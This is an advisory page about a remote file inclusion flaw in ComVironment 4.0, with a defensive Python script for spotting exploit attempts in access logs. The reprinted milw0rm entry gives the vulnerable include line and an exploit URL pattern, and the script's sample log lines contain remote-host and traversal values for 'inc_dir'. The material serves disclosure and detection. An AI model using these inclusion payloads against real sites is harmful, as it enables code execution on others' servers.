Vendor: ComVironment
By: GolD_M = Mahmood_ali
CVSS: 7.5 (HIGH)
CWE: Remote Code Execution
Product Name: ComVironment
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ComVironment 4.0 Remote Code Execution

ComVironment 4.0 is vulnerable to remote code execution. The flaw is on line 3 of the 'grab_globals.lib.php' file, where a require_once() call builds its include path from the 'inc_dir' variable. An attacker who supplies 'inc_dir' in a specially crafted URL controls which file is included and can execute arbitrary code on the target system.

Mitigation:

Apply the latest patch or upgrade to a newer version of the ComVironment application. Ensure proper input validation and sanitization of user-supplied data.
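
Because the entry lists no patch, reviewing web server logs for the request pattern described above is a practical check. The following is an added example, not code from the advisory or from ComVironment: it assumes combined-format access logs, treats any client-supplied 'inc_dir' as suspicious, and runs on constructed sample lines.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# From the advisory: the script path and the parameter that feeds require_once().
VULN_PATH = "/libraries/grab_globals.lib.php"
PARAM = "inc_dir"

# Assumption: Apache/nginx "combined"-style access log lines.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def classify(value):
    """Label an inc_dir value (assumption: the app never puts inc_dir in URLs)."""
    decoded = unquote(value)  # second decode catches double-encoded values
    if SCHEME_RE.match(decoded):
        return "remote-scheme"
    if "\x00" in decoded:
        return "null-byte"
    if ".." in decoded:
        return "traversal"
    return "client-supplied"

def scan_line(line):
    """Return a finding dict if the line requests the script with inc_dir set."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Collapse duplicate slashes and ignore case so trivial variants still match.
    path = re.sub(r"/+", "/", unquote(parts.path)).lower()
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if not path.endswith(VULN_PATH) or values is None:
        return None
    return {"ip": m.group("ip"), "reason": classify(values[0]), "value": values[0]}

def scan(lines):
    return [f for f in map(scan_line, lines) if f]

# Constructed sample input (documentation addresses and hostnames only).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jan/2007:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [18/Jan/2007:10:00:07 +0000] "GET /cv/libraries/grab_globals.lib.php?inc_dir=http%3A%2F%2Fhost.example.test%2F HTTP/1.1" 200 312',
    '192.0.2.44 - - [18/Jan/2007:10:00:09 +0000] "GET /cv/libraries//grab_globals.lib.php?inc_dir=..%2F..%2Ftmp%2F HTTP/1.0" 200 0',
    '192.0.2.10 - - [18/Jan/2007:10:01:00 +0000] "GET /cv/libraries/grab_globals.lib.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so a value sent in a POST body or cookie would not appear here.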
Source

Exploit-DB raw data:

/###################################################################\
#  ComVironment 4.0                                                 #
# =========================================================         #
# Published : 2007-01-18                                            #
# Remote: Yes                                                       #
# Site:http://switch.dl.sourceforge.net/sourceforge/comvironment/   #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.cN                                             #
# =====================================================             #
# ThanX=All My Friends- ABDULLAH00 - Jaeger                         #
# SpeciaL GreeTz : TrYaG-Team & 4lKaSrGoLd3N-Team                   #
\###################################################################/
/###################################################################\
# In :                                                              #
# /libraries/grab_globals.lib.php                                   #
# LiNe:                                                             #
# /3                                                                #
# Vulnerable Code:                                                  #
# require_once($inc_dir . 'libraries/grab_functions' . $ext);       #
# ExPlOiT :                                                         #
# /libraries/grab_globals.lib.php?inc_dir=[Evil-Code]               #
#                                                                   #
#                                                                   #
#             /#######################################\             #
#             #         TrYaG.Com & DwRaT.Com         #             #
#             \#######################################/             #
\###################################################################/

# milw0rm.com [2007-01-18]